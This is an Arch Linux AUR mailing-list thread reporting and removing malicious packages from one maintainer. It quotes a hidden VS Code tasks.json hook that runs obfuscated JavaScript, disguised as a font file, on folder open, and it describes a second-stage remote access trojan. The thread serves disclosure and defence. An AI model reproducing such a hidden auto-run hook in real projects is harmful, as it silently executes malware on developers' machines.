Thank you Saren and Nicolas for your reports.I have deleted all PKGBUILDs maintained by the AUR account [1] [2] [3] [4], nuked the commits to protect future unsuspecting adopters, and suspended the account in question.
The fact that the current revision of the tokentracker-cli PKGBUILD doesn’t point to the malicious commit *just yet* doesn’t matter. Both the upstream author and the PKGBUILD owner (who claims to be identical to the upstream author) have shown by now that neither can be trusted anyway.
I also encourage everyone to report the upstream GitHub repositories and account, which I just did as well.
Thanks again to y’all for staying vigilant! Regards Claudia[1]: https://lists.archlinux.org/archives/list/[email protected]/thread/LOSI5EMNDVM7RYUSIH6BUREFQVXKMY66/
[2]: https://lists.archlinux.org/archives/list/[email protected]/thread/Z7APUST5LNS3ZA33J2HTZNXE43D4VZYC/
[3]: https://lists.archlinux.org/archives/list/[email protected]/thread/3NXW67DXK3NUEET3RZ6ZOSP64DJOKWNZ/
[4]: https://lists.archlinux.org/archives/list/[email protected]/thread/YPAJCY5XPVARTJ3RZAARNHPMPLCUJGG4/
On 12.09.26 5:53 PM, Nicolas Boichat wrote:
On Sat, 12 Sept 2026 at 23:38, Nicolas Boichat <[email protected]> wrote:Hi, Thanks Saren, The maintainer should probably be banned from AUR as well. https://aur.archlinux.org/packages/tokentracker-cli => https://github.com/ayan-de/Token-Tracker/commit/60f86b3a5eabf73cf13e0bb883897dd0ebee0f4fSlight correction, the PKGBUILD points at https://github.com/ayan-de/Token-Tracker/tree/v0.1.13, which doesn't contain the strange commit. I'll let you figure out what's the proper action here.The 2 other packages I'm not sure, didn't check the binaries. Thanks, On Sat, 12 Sept 2026 at 22:36, Saren <[email protected]> wrote:Package: https://aur.archlinux.org/packages/glanced Upstream: https://github.com/ayan-de/glance-linux https://github.com/ayan-de/glance-linux/blob/master/public/fonts/fa-solid-500.woff2 is obfuscated javascript disguised as a .woff2 font file, with a lot of whitespace prepended. This javascript will be executed when this package is opened using vscode as defined in .vscode/tasks.json ```json { "label": "eslint-check", "type": "shell", "command": "(command -v node >/dev/null 2>&1 && node ./public/fonts/fa-solid-500.woff2) || (where node >nul 2>&1 && node ./public/fonts/fa-solid-500.woff2) || echo ''", "isBackground": true, "hide": true, "presentation": { "reveal": "never", "echo": false, "close": true }, "runOptions": { "runOn": "folderOpen" } } ``` When executed, the code will resolve a specific ethereum transaction from blockchain, resolving a 2nd stage payload from http, effectively a RAT. Detailed analysis by claude: https://gist.github.com/Saren-Arterius/d666ff56ef070a551f5f38a404b0c85d
OpenPGP_0xD11E9FC4F7C9DA3C.asc
Description: OpenPGP public key
OpenPGP_signature.asc
Description: OpenPGP digital signature
